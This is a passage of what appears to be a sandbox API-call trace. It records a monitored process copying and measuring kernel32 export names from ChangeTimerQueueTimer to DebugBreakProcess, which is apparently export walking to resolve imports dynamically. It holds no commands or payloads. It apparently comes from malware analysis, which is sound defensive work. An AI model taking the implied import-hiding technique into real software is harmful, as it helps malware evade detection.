returned="ChangeTimerQueueTimer" [0185.699] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.699] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.699] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.699] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.699] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.699] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.699] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.699] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.699] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.699] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.699] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.699] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.700] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.700] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.700] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.700] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.700] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.700] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.700] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.700] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.700] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.700] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.700] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.700] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.700] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.700] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.700] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.701] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.701] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.701] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.701] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.701] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.701] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.701] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.701] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.701] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0185.701] lstrlenA (lpString="COPYCONTEXT") returned 11 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0185.701] lstrlenA (lpString="COPYFILEA") returned 9 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0185.701] lstrlenA (lpString="COPYFILEEXA") returned 11 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0185.701] lstrlenA (lpString="COPYFILEEXW") returned 11 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0185.701] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0185.701] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0185.701] lstrlenA (lpString="COPYFILEW") returned 9 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0185.701] lstrlenA (lpString="COPYLZFILE") returned 10 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0185.701] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0185.701] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0185.701] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0185.701] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0185.702] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0185.702] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0185.702] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0185.702] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0185.702] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0185.702] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0185.702] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0185.702] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0185.702] lstrlenA (lpString="CREATEEVENTA") returned 12 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0185.702] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0185.702] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0185.702] lstrlenA (lpString="CREATEEVENTW") returned 12 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0185.702] lstrlenA (lpString="CREATEFIBER") returned 11 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0185.702] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0185.702] lstrlenA (lpString="CREATEFILEA") returned 11 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0185.702] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0185.702] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0185.702] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0185.702] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0185.702] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0185.703] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0185.703] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0185.703] lstrlenA (lpString="CREATEFILEW") returned 11 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0185.703] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0185.703] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0185.703] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0185.703] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0185.703] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0185.703] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0185.703] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0185.703] lstrlenA (lpString="CREATEJOBSET") returned 12 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0185.703] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0185.703] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0185.703] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0185.703] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0185.703] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0185.703] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0185.703] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0185.703] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0185.703] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0185.703] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0185.704] lstrlenA (lpString="CREATEPIPE") returned 10 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0185.704] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0185.704] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0185.704] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0185.704] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0185.704] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0185.704] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0185.704] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0185.704] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0185.704] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0185.704] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0185.704] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0185.704] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0185.704] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.704] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.704] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.704] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.704] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.704] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.704] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.705] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.705] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.705] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.705] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.705] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.705] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.705] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.705] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.705] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.705] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.705] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.705] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.705] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.705] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.705] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.705] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.705] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.705] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.705] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.706] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.706] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.706] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.706] lstrcpyA (in: lpString1=0x36fd5a4, 